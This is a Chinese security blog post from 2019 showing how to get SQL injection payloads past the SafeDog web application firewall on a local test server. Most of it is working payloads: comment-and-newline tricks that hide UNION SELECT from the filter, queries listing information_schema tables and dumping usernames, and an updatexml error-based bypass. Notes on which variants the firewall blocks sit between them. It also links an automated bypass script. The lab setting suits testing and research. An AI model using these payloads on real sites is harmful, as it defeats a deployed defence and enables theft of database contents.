Bypass安全狗注入-再见篇

  1. 参考链接
  2. 开打

很久之前弄过狗,好像没弄过。那么在来弄弄这够吧,让其从一只狗变成一只二哈。奇妙的比喻
MUQNee.png

参考链接

【思路/技术】某大佬的BypassWAF新思路(附脚本) - SecPulse.COM | 安全脉搏

开打

安全狗的版本
MUQrSP.png

常规的绕过:

and 1=1和and 1=2被拦截
Xor 1=1和Xor 1=2不拦截
if((1=1),1,2)和if((1=2),1,2)不拦截

MUQRoj.png

MUQ7OU.png

order by以前使用/**/OrDer/**/By/**/x这样就可以过,现在不行了
MUlVfI.png

后面使用上述文章的方法,现在还是能过的
MUlrN9.png

payload:/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0a

上面的payload url解码后会变成
MUljHg.png
利用换行的方法跳过了注释

尝试使用文章的方法
MUlhHe.png

http://192.168.241.158/sql.php?id=0/**/union/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0aselect%201,user%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0a() 

MUlH3t.png

这里发现version这个会被拦截,@@versionversion/**/(),version/**/(/**/),(((VeRsiOn/**/(/**/))))还是不行- -,带有关键字version并且在select后面就会被k
MU1ivV.png

http://192.168.241.158/sql.php?id=0/**/union/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0aselect%201,table_name/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0afrom/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0ainformation_schema.tables/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0awhere/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0atable_schema=%22tests%22

MUYMn0.png

MUYc3d.png

这里开了information_schema数据库保护还是没法绕过的(默认关闭)
MUYwB6.md.png

http://192.168.241.158/sql.php?id=0/**/union/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0aselect%201,username/**/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0afrom/**/users

MUY2jI.png

报错注入绕过

updatexml() 不拦截
updatexml(1,,1) 不拦截
updatexml(1,concat,1) 拦截
updatexml/**/#aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (1,concat,1) 不拦截
/**/and/**/updatexml/**/#aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (1,concat(0x7e,(select/**/user/**/#aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ()),0x7e),1) 不拦截

MUNXkT.png

附bypass waf脚本
MUUNcj.md.png

note/自己写的工具/自动化bypass_waf at master · 422926799/note · GitHub


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Bypass安全狗注入-再见篇

本文作者:九世

发布时间:2019-11-14, 21:37:56

最后更新:2019-11-15, 00:09:27

原始链接:http://jiushill.github.io/posts/9d8606fc.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录